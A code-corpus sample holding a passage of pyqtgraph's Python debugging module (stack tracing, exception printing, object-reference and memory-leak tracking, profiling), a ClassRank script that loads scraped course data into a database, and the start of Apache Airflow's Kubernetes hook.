self.stack.append(line)
elif event == 'return':
self.stack.pop()
line = " " * len(self.stack) + "<< " + self.frameInfo(frame)
print(line)
if len(self.stack) == 0:
self.count = 0
return self.trace
def stop(self):
sys.settrace(None)
def start(self):
sys.settrace(self.trace)
def frameInfo(self, fr):
filename = fr.f_code.co_filename
funcname = fr.f_code.co_name
lineno = fr.f_lineno
callfr = sys._getframe(3)
callline = "%s %d" % (callfr.f_code.co_name, callfr.f_lineno)
args, _, _, value_dict = inspect.getargvalues(fr)
if len(args) and args[0] == 'self':
instance = value_dict.get('self', None)
if instance is not None:
cls = getattr(instance, '__class__', None)
if cls is not None:
funcname = cls.__name__ + "." + funcname
return "%s: %s %s: %s" % (callline, filename, lineno, funcname)
def warnOnException(func):
"""Decorator that catches/ignores exceptions and prints a stack trace."""
def w(*args, **kwds):
try:
func(*args, **kwds)
except:
printExc('Ignored exception:')
return w
def getExc(indent=4, prefix='| ', skip=1):
lines = formatException(*sys.exc_info(), skip=skip)
lines2 = []
for l in lines:
lines2.extend(l.strip('\n').split('\n'))
lines3 = [" "*indent + prefix + l for l in lines2]
return '\n'.join(lines3)
def printExc(msg='', indent=4, prefix='|'):
"""Print an error message followed by an indented exception backtrace
(This function is intended to be called within except: blocks)"""
exc = getExc(indent, prefix + ' ', skip=2)
print("[%s] %s\n" % (time.strftime("%H:%M:%S"), msg))
print(" "*indent + prefix + '='*30 + '>>')
print(exc)
print(" "*indent + prefix + '='*30 + '<<')
def printTrace(msg='', indent=4, prefix='|'):
"""Print an error message followed by an indented stack trace"""
trace = backtrace(1)
#exc = getExc(indent, prefix + ' ')
print("[%s] %s\n" % (time.strftime("%H:%M:%S"), msg))
print(" "*indent + prefix + '='*30 + '>>')
for line in trace.split('\n'):
print(" "*indent + prefix + " " + line)
print(" "*indent + prefix + '='*30 + '<<')
def backtrace(skip=0):
return ''.join(traceback.format_stack()[:-(skip+1)])
def formatException(exctype, value, tb, skip=0):
"""Return a list of formatted exception strings.
Similar to traceback.format_exception, but displays the entire stack trace
rather than just the portion downstream of the point where the exception is
caught. In particular, unhandled exceptions that occur during Qt signal
handling do not usually show the portion of the stack that emitted the
signal.
"""
lines = traceback.format_exception(exctype, value, tb)
lines = [lines[0]] + traceback.format_stack()[:-(skip+1)] + [' --- exception caught here ---\n'] + lines[1:]
return lines
def printException(exctype, value, traceback):
"""Print an exception with its full traceback.
Set `sys.excepthook = printException` to ensure that exceptions caught
inside Qt signal handlers are printed with their full stack trace.
"""
print(''.join(formatException(exctype, value, traceback, skip=1)))
def listObjs(regex='Q', typ=None):
"""List all objects managed by python gc with class name matching regex.
Finds 'Q...' classes by default."""
if typ is not None:
return [x for x in gc.get_objects() if isinstance(x, typ)]
else:
return [x for x in gc.get_objects() if re.match(regex, type(x).__name__)]
def findRefPath(startObj, endObj, maxLen=8, restart=True, seen={}, path=None, ignore=None):
"""Determine all paths of object references from startObj to endObj"""
refs = []
if path is None:
path = [endObj]
if ignore is None:
ignore = {}
ignore[id(sys._getframe())] = None
ignore[id(path)] = None
ignore[id(seen)] = None
prefix = " "*(8-maxLen)
#print prefix + str(map(type, path))
prefix += " "
if restart:
#gc.collect()
seen.clear()
gc.collect()
newRefs = [r for r in gc.get_referrers(endObj) if id(r) not in ignore]
ignore[id(newRefs)] = None
#fo = allFrameObjs()
#newRefs = []
#for r in gc.get_referrers(endObj):
#try:
#if r not in fo:
#newRefs.append(r)
#except:
#newRefs.append(r)
for r in newRefs:
#print prefix+"->"+str(type(r))
if type(r).__name__ in ['frame', 'function', 'listiterator']:
#print prefix+" FRAME"
continue
try:
if any([r is x for x in path]):
#print prefix+" LOOP", objChainString([r]+path)
continue
except:
print(r)
print(path)
raise
if r is startObj:
refs.append([r])
print(refPathString([startObj]+path))
continue
if maxLen == 0:
#print prefix+" END:", objChainString([r]+path)
continue
## See if we have already searched this node.
## If not, recurse.
tree = None
try:
cache = seen[id(r)]
if cache[0] >= maxLen:
tree = cache[1]
for p in tree:
print(refPathString(p+path))
except KeyError:
pass
ignore[id(tree)] = None
if tree is None:
tree = findRefPath(startObj, r, maxLen-1, restart=False, path=[r]+path, ignore=ignore)
seen[id(r)] = [maxLen, tree]
## integrate any returned results
if len(tree) == 0:
#print prefix+" EMPTY TREE"
continue
else:
for p in tree:
refs.append(p+[r])
#seen[id(r)] = [maxLen, refs]
return refs
def objString(obj):
"""Return a short but descriptive string for any object"""
try:
if type(obj) in [int, float]:
return str(obj)
elif isinstance(obj, dict):
if len(obj) > 5:
return "<dict {%s,...}>" % (",".join(list(obj.keys())[:5]))
else:
return "<dict {%s}>" % (",".join(list(obj.keys())))
elif isinstance(obj, str):
if len(obj) > 50:
return '"%s..."' % obj[:50]
else:
return obj[:]
elif isinstance(obj, ndarray):
return "<ndarray %s %s>" % (str(obj.dtype), str(obj.shape))
elif hasattr(obj, '__len__'):
if len(obj) > 5:
return "<%s [%s,...]>" % (type(obj).__name__, ",".join([type(o).__name__ for o in obj[:5]]))
else:
return "<%s [%s]>" % (type(obj).__name__, ",".join([type(o).__name__ for o in obj]))
else:
return "<%s %s>" % (type(obj).__name__, obj.__class__.__name__)
except:
return str(type(obj))
def refPathString(chain):
"""Given a list of adjacent objects in a reference path, print the 'natural' path
names (ie, attribute names, keys, and indexes) that follow from one object to the next ."""
s = objString(chain[0])
i = 0
while i < len(chain)-1:
#print " -> ", i
i += 1
o1 = chain[i-1]
o2 = chain[i]
cont = False
if isinstance(o1, list) or isinstance(o1, tuple):
if any([o2 is x for x in o1]):
s += "[%d]" % o1.index(o2)
continue
#print " not list"
if isinstance(o2, dict) and hasattr(o1, '__dict__') and o2 == o1.__dict__:
i += 1
if i >= len(chain):
s += ".__dict__"
continue
o3 = chain[i]
for k in o2:
if o2[k] is o3:
s += '.%s' % k
cont = True
continue
#print " not __dict__"
if isinstance(o1, dict):
try:
if o2 in o1:
s += "[key:%s]" % objString(o2)
continue
except TypeError:
pass
for k in o1:
if o1[k] is o2:
s += "[%s]" % objString(k)
cont = True
continue
#print " not dict"
#for k in dir(o1): ## Not safe to request attributes like this.
#if getattr(o1, k) is o2:
#s += ".%s" % k
#cont = True
#continue
#print " not attr"
if cont:
continue
s += " ? "
sys.stdout.flush()
return s
def objectSize(obj, ignore=None, verbose=False, depth=0, recursive=False):
"""Guess how much memory an object is using"""
ignoreTypes = ['MethodType', 'UnboundMethodType', 'BuiltinMethodType', 'FunctionType', 'BuiltinFunctionType']
ignoreTypes = [getattr(types, key) for key in ignoreTypes if hasattr(types, key)]
ignoreRegex = re.compile('(method-wrapper|Flag|ItemChange|Option|Mode)')
if ignore is None:
ignore = {}
indent = ' '*depth
try:
hash(obj)
hsh = obj
except:
hsh = "%s:%d" % (str(type(obj)), id(obj))
if hsh in ignore:
return 0
ignore[hsh] = 1
try:
size = sys.getsizeof(obj)
except TypeError:
size = 0
if isinstance(obj, ndarray):
try:
size += len(obj.data)
except:
pass
if recursive:
if type(obj) in [list, tuple]:
if verbose:
print(indent+"list:")
for o in obj:
s = objectSize(o, ignore=ignore, verbose=verbose, depth=depth+1)
if verbose:
print(indent+' +', s)
size += s
elif isinstance(obj, dict):
if verbose:
print(indent+"list:")
for k in obj:
s = objectSize(obj[k], ignore=ignore, verbose=verbose, depth=depth+1)
if verbose:
print(indent+' +', k, s)
size += s
#elif isinstance(obj, QtCore.QObject):
#try:
#childs = obj.children()
#if verbose:
#print indent+"Qt children:"
#for ch in childs:
#s = objectSize(obj, ignore=ignore, verbose=verbose, depth=depth+1)
#size += s
#if verbose:
#print indent + ' +', ch.objectName(), s
#except:
#pass
#if isinstance(obj, types.InstanceType):
gc.collect()
if verbose:
print(indent+'attrs:')
for k in dir(obj):
if k in ['__dict__']:
continue
o = getattr(obj, k)
if type(o) in ignoreTypes:
continue
strtyp = str(type(o))
if ignoreRegex.search(strtyp):
continue
#if isinstance(o, types.ObjectType) and strtyp == "<type 'method-wrapper'>":
#continue
#if verbose:
#print indent, k, '?'
refs = [r for r in gc.get_referrers(o) if type(r) != types.FrameType]
if len(refs) == 1:
s = objectSize(o, ignore=ignore, verbose=verbose, depth=depth+1)
size += s
if verbose:
print(indent + " +", k, s)
#else:
#if verbose:
#print indent + ' -', k, len(refs)
return size
class GarbageWatcher(object):
"""
Convenient dictionary for holding weak references to objects.
Mainly used to check whether the objects have been collect yet or not.
Example:
gw = GarbageWatcher()
gw['objName'] = obj
gw['objName2'] = obj2
gw.check()
"""
def __init__(self):
self.objs = weakref.WeakValueDictionary()
self.allNames = []
def add(self, obj, name):
self.objs[name] = obj
self.allNames.append(name)
def __setitem__(self, name, obj):
self.add(obj, name)
def check(self):
"""Print a list of all watched objects and whether they have been collected."""
gc.collect()
dead = self.allNames[:]
alive = []
for k in self.objs:
dead.remove(k)
alive.append(k)
print("Deleted objects:", dead)
print("Live objects:", alive)
def __getitem__(self, item):
return self.objs[item]
class Profiler(object):
"""Simple profiler allowing measurement of multiple time intervals.
By default, profilers are disabled. To enable profiling, set the
environment variable `PYQTGRAPHPROFILE` to a comma-separated list of
fully-qualified names of profiled functions.
Calling a profiler registers a message (defaulting to an increasing
counter) that contains the time elapsed since the last call. When the
profiler is about to be garbage-collected, the messages are passed to the
outer profiler if one is running, or printed to stdout otherwise.
If `delayed` is set to False, messages are immediately printed instead.
Example:
def function(...):
profiler = Profiler()
... do stuff ...
profiler('did stuff')
... do other stuff ...
profiler('did other stuff')
# profiler is garbage-collected and flushed at function end
If this function is a method of class C, setting `PYQTGRAPHPROFILE` to
"C.function" (without the module name) will enable this profiler.
For regular functions, use the qualified name of the function, stripping
only the initial "pyqtgraph." prefix from the module.
"""
_profilers = os.environ.get("PYQTGRAPHPROFILE", None)
_profilers = _profilers.split(",") if _profilers is not None else []
_depth = 0
_msgs = []
disable = False # set this flag to disable all or individual profilers at runtime
class DisabledProfiler(object):
def __init__(self, *args, **kwds):
pass
def __call__(self, *args):
pass
def finish(self):
pass
def mark(self, msg=None):
pass
_disabledProfiler = DisabledProfiler()
def __new__(cls, msg=None, disabled='env', delayed=True):
"""Optionally create a new profiler based on caller's qualname.
"""
if disabled is True or (disabled == 'env' and len(cls._profilers) == 0):
return cls._disabledProfiler
# determine the qualified name of the caller function
caller_frame = sys._getframe(1)
try:
caller_object_type = type(caller_frame.f_locals["self"])
except KeyError: # we are in a regular function
qualifier = caller_frame.f_globals["__name__"].split(".", 1)[-1]
else: # we are in a method
qualifier = caller_object_type.__name__
func_qualname = qualifier + "." + caller_frame.f_code.co_name
if disabled == 'env' and func_qualname not in cls._profilers: # don't do anything
return cls._disabledProfiler
# create an actual profiling object
cls._depth += 1
obj = super(Profiler, cls).__new__(cls)
obj._name = msg or func_qualname
obj._delayed = delayed
obj._markCount = 0
obj._finished = False
obj._firstTime = obj._lastTime = ptime.time()
obj._newMsg("> Entering " + obj._name)
return obj
def __call__(self, msg=None):
"""Register or print a new message with timing information.
"""
if self.disable:
return
if msg is None:
msg = str(self._markCount)
self._markCount += 1
newTime = ptime.time()
self._newMsg(" %s: %0.4f ms",
msg, (newTime - self._lastTime) * 1000)
self._lastTime = newTime
def mark(self, msg=None):
self(msg)
def _newMsg(self, msg, *args):
msg = " " * (self._depth - 1) + msg
if self._delayed:
self._msgs.append((msg, args))
else:
self.flush()
print(msg % args)
def __del__(self):
self.finish()
def finish(self, msg=None):
"""Add a final message; flush the message list if no parent profiler.
"""
if self._finished or self.disable:
return
self._finished = True
if msg is not None:
self(msg)
self._newMsg("< Exiting %s, total time: %0.4f ms",
self._name, (ptime.time() - self._firstTime) * 1000)
type(self)._depth -= 1
if self._depth < 1:
self.flush()
def flush(self):
if self._msgs:
print("\n".join([m[0]%m[1] for m in self._msgs]))
type(self)._msgs = []
def profile(code, name='profile_run', sort='cumulative', num=30):
"""Common-use for cProfile"""
cProfile.run(code, name)
stats = pstats.Stats(name)
stats.sort_stats(sort)
stats.print_stats(num)
return stats
#### Code for listing (nearly) all objects in the known universe
#### http://utcc.utoronto.ca/~cks/space/blog/python/GetAllObjects
# Recursively expand slist's objects
# into olist, using seen to track
# already processed objects.
def _getr(slist, olist, first=True):
i = 0
for e in slist:
oid = id(e)
typ = type(e)
if oid in olist or typ is int: ## or e in olist: ## since we're excluding all ints, there is no longer a need to check for olist keys
continue
olist[oid] = e
if first and (i%1000) == 0:
gc.collect()
tl = gc.get_referents(e)
if tl:
_getr(tl, olist, first=False)
i += 1
# The public function.
def get_all_objects():
"""Return a list of all live Python objects (excluding int and long), not including the list itself."""
gc.collect()
gcl = gc.get_objects()
olist = {}
_getr(gcl, olist)
del olist[id(olist)]
del olist[id(gcl)]
del olist[id(sys._getframe())]
return olist
def lookup(oid, objects=None):
"""Return an object given its ID, if it exists."""
if objects is None:
objects = get_all_objects()
return objects[oid]
class ObjTracker(object):
"""
Tracks all objects under the sun, reporting the changes between snapshots: what objects are created, deleted, and persistent.
This class is very useful for tracking memory leaks. The class goes to great (but not heroic) lengths to avoid tracking
its own internal objects.
Example:
ot = ObjTracker() # takes snapshot of currently existing objects
... do stuff ...
ot.diff() # prints lists of objects created and deleted since ot was initialized
... do stuff ...
ot.diff() # prints lists of objects created and deleted since last call to ot.diff()
# also prints list of items that were created since initialization AND have not been deleted yet
# (if done correctly, this list can tell you about objects that were leaked)
arrays = ot.findPersistent('ndarray') ## returns all objects matching 'ndarray' (string match, not instance checking)
## that were considered persistent when the last diff() was run
describeObj(arrays[0]) ## See if we can determine who has references to this array
"""
allObjs = {} ## keep track of all objects created and stored within class instances
allObjs[id(allObjs)] = None
def __init__(self):
self.startRefs = {} ## list of objects that exist when the tracker is initialized {oid: weakref}
## (If it is not possible to weakref the object, then the value is None)
self.startCount = {}
self.newRefs = {} ## list of objects that have been created since initialization
self.persistentRefs = {} ## list of objects considered 'persistent' when the last diff() was called
self.objTypes = {}
ObjTracker.allObjs[id(self)] = None
self.objs = [self.__dict__, self.startRefs, self.startCount, self.newRefs, self.persistentRefs, self.objTypes]
self.objs.append(self.objs)
for v in self.objs:
ObjTracker.allObjs[id(v)] = None
self.start()
def findNew(self, regex):
"""Return all objects matching regex that were considered 'new' when the last diff() was run."""
return self.findTypes(self.newRefs, regex)
def findPersistent(self, regex):
"""Return all objects matching regex that were considered 'persistent' when the last diff() was run."""
return self.findTypes(self.persistentRefs, regex)
def start(self):
"""
Remember the current set of objects as the comparison for all future calls to diff()
Called automatically on init, but can be called manually as well.
"""
refs, count, objs = self.collect()
for r in self.startRefs:
self.forgetRef(self.startRefs[r])
self.startRefs.clear()
self.startRefs.update(refs)
for r in refs:
self.rememberRef(r)
self.startCount.clear()
self.startCount.update(count)
#self.newRefs.clear()
#self.newRefs.update(refs)
def diff(self, **kargs):
"""
Compute all differences between the current object set and the reference set.
Print a set of reports for created, deleted, and persistent objects
"""
refs, count, objs = self.collect() ## refs contains the list of ALL objects
## Which refs have disappeared since call to start() (these are only displayed once, then forgotten.)
delRefs = {}
for i in list(self.startRefs.keys()):
if i not in refs:
delRefs[i] = self.startRefs[i]
del self.startRefs[i]
self.forgetRef(delRefs[i])
for i in list(self.newRefs.keys()):
if i not in refs:
delRefs[i] = self.newRefs[i]
del self.newRefs[i]
self.forgetRef(delRefs[i])
#print "deleted:", len(delRefs)
## Which refs have appeared since call to start() or diff()
persistentRefs = {} ## created since start(), but before last diff()
createRefs = {} ## created since last diff()
for o in refs:
if o not in self.startRefs:
if o not in self.newRefs:
createRefs[o] = refs[o] ## object has been created since last diff()
else:
persistentRefs[o] = refs[o] ## object has been created since start(), but before last diff() (persistent)
#print "new:", len(newRefs)
## self.newRefs holds the entire set of objects created since start()
for r in self.newRefs:
self.forgetRef(self.newRefs[r])
self.newRefs.clear()
self.newRefs.update(persistentRefs)
self.newRefs.update(createRefs)
for r in self.newRefs:
self.rememberRef(self.newRefs[r])
#print "created:", len(createRefs)
## self.persistentRefs holds all objects considered persistent.
self.persistentRefs.clear()
self.persistentRefs.update(persistentRefs)
print("----------- Count changes since start: ----------")
c1 = count.copy()
for k in self.startCount:
c1[k] = c1.get(k, 0) - self.startCount[k]
typs = list(c1.keys())
typs.sort(key=lambda a: c1[a])
for t in typs:
if c1[t] == 0:
continue
num = "%d" % c1[t]
print(" " + num + " "*(10-len(num)) + str(t))
print("----------- %d Deleted since last diff: ------------" % len(delRefs))
self.report(delRefs, objs, **kargs)
print("----------- %d Created since last diff: ------------" % len(createRefs))
self.report(createRefs, objs, **kargs)
print("----------- %d Created since start (persistent): ------------" % len(persistentRefs))
self.report(persistentRefs, objs, **kargs)
def __del__(self):
self.startRefs.clear()
self.startCount.clear()
self.newRefs.clear()
self.persistentRefs.clear()
del ObjTracker.allObjs[id(self)]
for v in self.objs:
del ObjTracker.allObjs[id(v)]
@classmethod
def isObjVar(cls, o):
return type(o) is cls or id(o) in cls.allObjs
def collect(self):
print("Collecting list of all objects...")
gc.collect()
objs = get_all_objects()
frame = sys._getframe()
del objs[id(frame)] ## ignore the current frame
del objs[id(frame.f_code)]
ignoreTypes = [int]
refs = {}
count = {}
for k in objs:
o = objs[k]
typ = type(o)
oid = id(o)
if ObjTracker.isObjVar(o) or typ in ignoreTypes:
continue
try:
ref = weakref.ref(obj)
except:
ref = None
refs[oid] = ref
typ = type(o)
typStr = typeStr(o)
self.objTypes[oid] = typStr
ObjTracker.allObjs[id(typStr)] = None
count[typ] = count.get(typ, 0) + 1
print("All objects: %d Tracked objects: %d" % (len(objs), len(refs)))
return refs, count, objs
def forgetRef(self, ref):
if ref is not None:
del ObjTracker.allObjs[id(ref)]
def rememberRef(self, ref):
## Record the address of the weakref object so it is not included in future object counts.
if ref is not None:
ObjTracker.allObjs[id(ref)] = None
def lookup(self, oid, ref, objs=None):
if ref is None or ref() is None:
try:
obj = lookup(oid, objects=objs)
except:
obj = None
else:
obj = ref()
return obj
def report(self, refs, allobjs=None, showIDs=False):
if allobjs is None:
allobjs = get_all_objects()
count = {}
rev = {}
for oid in refs:
obj = self.lookup(oid, refs[oid], allobjs)
if obj is None:
typ = "[del] " + self.objTypes[oid]
else:
typ = typeStr(obj)
if typ not in rev:
rev[typ] = []
rev[typ].append(oid)
c = count.get(typ, [0,0])
count[typ] = [c[0]+1, c[1]+objectSize(obj)]
typs = list(count.keys())
typs.sort(key=lambda a: count[a][1])
for t in typs:
line = " %d\t%d\t%s" % (count[t][0], count[t][1], t)
if showIDs:
line += "\t"+",".join(map(str,rev[t]))
print(line)
def findTypes(self, refs, regex):
allObjs = get_all_objects()
ids = {}
objs = []
r = re.compile(regex)
for k in refs:
if r.search(self.objTypes[k]):
objs.append(self.lookup(k, refs[k], allObjs))
return objs
def describeObj(obj, depth=4, path=None, ignore=None):
"""
Trace all reference paths backward, printing a list of different ways this object can be accessed.
Attempts to answer the question "who has a reference to this object"
"""
if path is None:
path = [obj]
if ignore is None:
ignore = {} ## holds IDs of objects used within the function.
ignore[id(sys._getframe())] = None
ignore[id(path)] = None
gc.collect()
refs = gc.get_referrers(obj)
ignore[id(refs)] = None
printed=False
for ref in refs:
if id(ref) in ignore:
continue
if id(ref) in list(map(id, path)):
print("Cyclic reference: " + refPathString([ref]+path))
printed = True
continue
newPath = [ref]+path
if len(newPath) >= depth:
refStr = refPathString(newPath)
if '[_]' not in refStr: ## ignore '_' references generated by the interactive shell
print(refStr)
printed = True
else:
describeObj(ref, depth, newPath, ignore)
printed = True
if not printed:
print("Dead end: " + refPathString(path))
def typeStr(obj):
"""Create a more useful type string by making <instance> types report their class."""
typ = type(obj)
if typ == getattr(types, 'InstanceType', None):
return "<instance of %s>" % obj.__class__.__name__
else:
return str(typ)
def searchRefs(obj, *args):
"""Pseudo-interactive function for tracing references backward.
**Arguments:**
obj: The initial object from which to start searching
args: A set of string or int arguments.
each integer selects one of obj's referrers to be the new 'obj'
each string indicates an action to take on the current 'obj':
t: print the types of obj's referrers
l: print the lengths of obj's referrers (if they have __len__)
i: print the IDs of obj's referrers
o: print obj
ro: return obj
rr: return list of obj's referrers
Examples::
searchRefs(obj, 't') ## Print types of all objects referring to obj
searchRefs(obj, 't', 0, 't') ## ..then select the first referrer and print the types of its referrers
searchRefs(obj, 't', 0, 't', 'l') ## ..also print lengths of the last set of referrers
searchRefs(obj, 0, 1, 'ro') ## Select index 0 from obj's referrer, then select index 1 from the next set of referrers, then return that object
"""
ignore = {id(sys._getframe()): None}
gc.collect()
refs = gc.get_referrers(obj)
ignore[id(refs)] = None
refs = [r for r in refs if id(r) not in ignore]
for a in args:
#fo = allFrameObjs()
#refs = [r for r in refs if r not in fo]
if type(a) is int:
obj = refs[a]
gc.collect()
refs = gc.get_referrers(obj)
ignore[id(refs)] = None
refs = [r for r in refs if id(r) not in ignore]
elif a == 't':
print(list(map(typeStr, refs)))
elif a == 'i':
print(list(map(id, refs)))
elif a == 'l':
def slen(o):
if hasattr(o, '__len__'):
return len(o)
else:
return None
print(list(map(slen, refs)))
elif a == 'o':
print(obj)
elif a == 'ro':
return obj
elif a == 'rr':
return refs
def allFrameObjs():
"""Return list of frame objects in current stack. Useful if you want to ignore these objects in refernece searches"""
f = sys._getframe()
objs = []
while f is not None:
objs.append(f)
objs.append(f.f_code)
#objs.append(f.f_locals)
#objs.append(f.f_globals)
#objs.append(f.f_builtins)
f = f.f_back
return objs
def findObj(regex):
"""Return a list of objects whose typeStr matches regex"""
allObjs = get_all_objects()
objs = []
r = re.compile(regex)
for i in allObjs:
obj = allObjs[i]
if r.search(typeStr(obj)):
objs.append(obj)
return objs
def listRedundantModules():
"""List modules that have been imported more than once via different paths."""
mods = {}
for name, mod in sys.modules.items():
if not hasattr(mod, '__file__'):
continue
mfile = os.path.abspath(mod.__file__)
if mfile[-1] == 'c':
mfile = mfile[:-1]
if mfile in mods:
print("module at %s has 2 names: %s, %s" % (mfile, name, mods[mfile]))
else:
mods[mfile] = name
def walkQObjectTree(obj, counts=None, verbose=False, depth=0):
"""
Walk through a tree of QObjects, doing nothing to them.
The purpose of this function is to find dead objects and generate a crash
immediately rather than stumbling upon them later.
Prints a count of the objects encountered, for fun. (or is it?)
"""
if verbose:
print(" "*depth + typeStr(obj))
report = False
if counts is None:
counts = {}
report = True
typ = str(type(obj))
try:
counts[typ] += 1
except KeyError:
counts[typ] = 1
for child in obj.children():
walkQObjectTree(child, counts, verbose, depth+1)
return counts
QObjCache = {}
def qObjectReport(verbose=False):
"""Generate a report counting all QObjects and their types"""
global qObjCache
count = {}
for obj in findObj('PyQt'):
if isinstance(obj, QtCore.QObject):
oid = id(obj)
if oid not in QObjCache:
QObjCache[oid] = typeStr(obj) + " " + obj.objectName()
try:
QObjCache[oid] += " " + obj.parent().objectName()
QObjCache[oid] += " " + obj.text()
except:
pass
print("check obj", oid, str(QObjCache[oid]))
if obj.parent() is None:
walkQObjectTree(obj, count, verbose)
typs = list(count.keys())
typs.sort()
for t in typs:
print(count[t], "\t", t)
class PrintDetector(object):
"""Find code locations that print to stdout."""
def __init__(self):
self.stdout = sys.stdout
sys.stdout = self
def remove(self):
sys.stdout = self.stdout
def __del__(self):
self.remove()
def write(self, x):
self.stdout.write(x)
traceback.print_stack()
def flush(self):
self.stdout.flush()
def listQThreads():
"""Prints Thread IDs (Qt's, not OS's) for all QThreads."""
thr = findObj('[Tt]hread')
thr = [t for t in thr if isinstance(t, QtCore.QThread)]
import sip
for t in thr:
print("--> ", t)
print(" Qt ID: 0x%x" % sip.unwrapinstance(t))
def pretty(data, indent=''):
"""Format nested dict/list/tuple structures into a more human-readable string
This function is a bit better than pprint for displaying OrderedDicts.
"""
ret = ""
ind2 = indent + " "
if isinstance(data, dict):
ret = indent+"{\n"
for k, v in data.items():
ret += ind2 + repr(k) + ": " + pretty(v, ind2).strip() + "\n"
ret += indent+"}\n"
elif isinstance(data, list) or isinstance(data, tuple):
s = repr(data)
if len(s) < 40:
ret += indent + s
else:
if isinstance(data, list):
d = '[]'
else:
d = '()'
ret = indent+d[0]+"\n"
for i, v in enumerate(data):
ret += ind2 + str(i) + ": " + pretty(v, ind2).strip() + "\n"
ret += indent+d[1]+"\n"
else:
ret += indent + repr(data)
return ret
class ThreadTrace(object):
"""
Used to debug freezing by starting a new thread that reports on the
location of other threads periodically.
"""
def __init__(self, interval=10.0):
self.interval = interval
self.lock = Mutex()
self._stop = False
self.start()
def stop(self):
with self.lock:
self._stop = True
def start(self, interval=None):
if interval is not None:
self.interval = interval
self._stop = False
self.thread = threading.Thread(target=self.run)
self.thread.daemon = True
self.thread.start()
def run(self):
while True:
with self.lock:
if self._stop is True:
return
print("\n============= THREAD FRAMES: ================")
for id, frame in sys._current_frames().items():
if id == threading.current_thread().ident:
continue
# try to determine a thread name
try:
name = threading._active.get(id, None)
except:
name = None
if name is None:
try:
# QThread._names must be manually set by thread creators.
name = QtCore.QThread._names.get(id)
except:
name = None
if name is None:
name = "???"
print("<< thread %d \"%s\" >>" % (id, name))
traceback.print_stack(frame)
print("===============================================\n")
time.sleep(self.interval)
class ThreadColor(object):
"""
Wrapper on stdout/stderr that colors text by the current thread ID.
*stream* must be 'stdout' or 'stderr'.
"""
colors = {}
lock = Mutex()
def __init__(self, stream):
self.stream = getattr(sys, stream)
self.err = stream == 'stderr'
setattr(sys, stream, self)
def write(self, msg):
with self.lock:
cprint.cprint(self.stream, self.color(), msg, -1, stderr=self.err)
def flush(self):
with self.lock:
self.stream.flush()
def color(self):
tid = threading.current_thread()
if tid not in self.colors:
c = (len(self.colors) % 15) + 1
self.colors[tid] = c
return self.colors[tid]
def enableFaulthandler():
""" Enable faulthandler for all threads.
If the faulthandler package is available, this function disables and then
re-enables fault handling for all threads (this is necessary to ensure any
new threads are handled correctly), and returns True.
If faulthandler is not available, then returns False.
"""
try:
import faulthandler
# necessary to disable first or else new threads may not be handled.
faulthandler.disable()
faulthandler.enable(all_threads=True)
return True
except ImportError:
return False
|
ArteliaTelemac/PostTelemac
|
PostTelemac/meshlayerlibs/pyqtgraph/debug.py
|
Python
|
gpl-3.0
| 41,232
| 0.00827
|
import datetime
import json
from classrank.database.wrapper import Query
"""add_to_database.py: adds courses from Grouch to the ClassRank DB."""
def add_to_database(grouch_output, db):
"""
Add courses from Grouch's output to a db.
Keyword arguments:
grouch_output -- the output of Grouch (the scraped info)
db -- the db to add to
"""
print("Beginning Grouch parse ({}).".format(datetime.datetime.now()))
all_courses = parse(grouch_output)
print("Ending Grouch parse ({}).".format(datetime.datetime.now()))
if len(all_courses) != 0:
print("Beginning database add ({}).".format(datetime.datetime.now()))
with Query(db) as q:
school_dict = {"name": "Georgia Institute of Technology",
"abbreviation": "gatech"}
if not _school_in_database(school_dict, db, q):
q.add(db.school(**school_dict))
school_id = q.query(db.school).filter_by(**school_dict).one().uid
for course, sections in all_courses:
course_dict = {"school_id": school_id,
"name": course['name'],
"description": course['fullname'],
"number": course['number'],
"subject": course['school']}
if not _course_in_database(course_dict, db, q):
q.add(db.course(**course_dict))
course_id = q.query(db.course).filter_by(**course_dict).one().uid
for section in sections:
section_dict = {"course_id": course_id,
"semester": course['semester'],
"year": course['year'],
"name": section['section_id'],
"crn": section['crn']}
q.add(db.section(**section_dict))
print("Ending database add ({}).".format(datetime.datetime.now()))
def parse(to_read):
"""Parse Grouch output (JSON) to dictionaries, with some additions.
Keyword arguments:
to_read -- the file of Grouch output (one JSON document per line)
Return a list of tuples of (course, sections_of_course).
"""
# A mapping of semester number to string name
semester_map = {'2': 'Spring',
'5': 'Summer',
'8': 'Fall'}
all_courses = []
with open(to_read, 'r') as f:
for line in f:
course = json.loads(line)
# Extract the semester and year for easier use later
semester_token = course['semester'] # of the form yyyymm
year = semester_token[0:4]
month = semester_token[5:6]
semester = semester_map[month]
course['year'] = year
course['semester'] = semester
sections = []
if 'sections' in course: # If the course has sections
sections = course['sections']
all_courses.append((course, sections))
return all_courses
def _school_in_database(school_dict, db, q):
"""Check if a school is in the database.
Keyword arguments:
school_dict -- a dictionary specifying the school to check
db -- the db to search in
q -- the Query object used to query the database
Returns True if there are instances of school in database, False otherwise
"""
return len(q.query(db.school).filter_by(**school_dict).all()) != 0
def _course_in_database(course_dict, db, q):
"""Check if a course is in the database.
Keyword arguments:
course_dict -- a dictionary specifying the course to check
db -- the db to search in
q -- the Query object used to query the database
Returns True if there are instances of course in database, False otherwise
"""
return len(q.query(db.course).filter_by(**course_dict).all()) != 0
|
classrank/ClassRank
|
classrank/grouch/grouch_util.py
|
Python
|
gpl-2.0
| 3,951
| 0.000253
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tempfile
from typing import Any, Dict, Generator, Optional, Tuple, Union
import yaml
from cached_property import cached_property
from kubernetes import client, config, watch
from airflow.exceptions import AirflowException
from airflow.hooks.base import BaseHook
def _load_body_to_dict(body):
try:
body_dict = yaml.safe_load(body)
except yaml.YAMLError as e:
raise AirflowException("Exception when loading resource definition: %s\n" % e)
return body_dict
class KubernetesHook(BaseHook):
"""
Creates Kubernetes API connection.
- use in cluster configuration by using ``extra__kubernetes__in_cluster`` in connection
- use custom config by providing path to the file using ``extra__kubernetes__kube_config_path``
- use custom configuration by providing content of kubeconfig file via
``extra__kubernetes__kube_config`` in connection
- use default config by providing no extras
This hook check for configuration option in the above order. Once an option is present it will
use this configuration.
.. seealso::
For more information about Kubernetes connection:
:doc:`/connections/kubernetes`
